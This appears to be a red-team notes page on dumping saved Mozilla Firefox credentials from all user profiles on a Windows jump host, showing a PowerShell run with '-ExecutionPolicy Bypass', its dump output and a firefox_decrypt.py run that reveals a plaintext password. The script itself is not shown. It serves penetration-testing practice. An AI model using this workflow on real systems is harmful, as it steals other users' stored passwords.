Windows - Mozilla Firefox
Last updated
Was this helpful?
Last updated
Was this helpful?
When trying to gather additional credentials from lets say an Administrator Jump Host, extracting sensitive Mozilla Firefox files is a great approach. Doing this manually is boring and time consuming, especially if there are hundreds of users under C:\Users
.
To simplify this I've made a simple PowerShell script, firefox_dump.ps1
, that gathers all sensitive Mozilla Firefox information which can later be decrypted using firefox_decrypt.py
or similar.
The script should be ran as a high privileged user to gather as much information as possible.
PS E:\devop-scripts> powershell.exe -ExecutionPolicy Bypass .\firefox_dump.ps1
[-] 'Public' doesn't have any saved passwords in Mozilla Firefox
[+] Dumping secrets from 'user' to: C:\Users\void\AppData\Local\Temp\user\firefox\ahf32hh2.default-release
[+] Dumping secrets from 'user2' to: C:\Users\void\AppData\Local\Temp\user2\firefox\plhh3lmm.default-release
[-] 'user3' doesn't have any saved passwords in Mozilla Firefox
[+] Dumping secrets from 'void' to: C:\Users\void\AppData\Local\Temp\void\firefox\plmxz1zm.default-release
If you don't want to upload files to the target host it's possible to simply copy-paste the try-catch code from the script and run it as is in PowerShell.
┌──(void㉿void)-[/opt/firefox_decrypt]
└─$ ./firefox_decrypt.py /tmp/firefox-loot/user1
Website: http://localhost:8000
Username: 'dev-user'
Password: 'D3velopm3ntM@st3rK3y*!'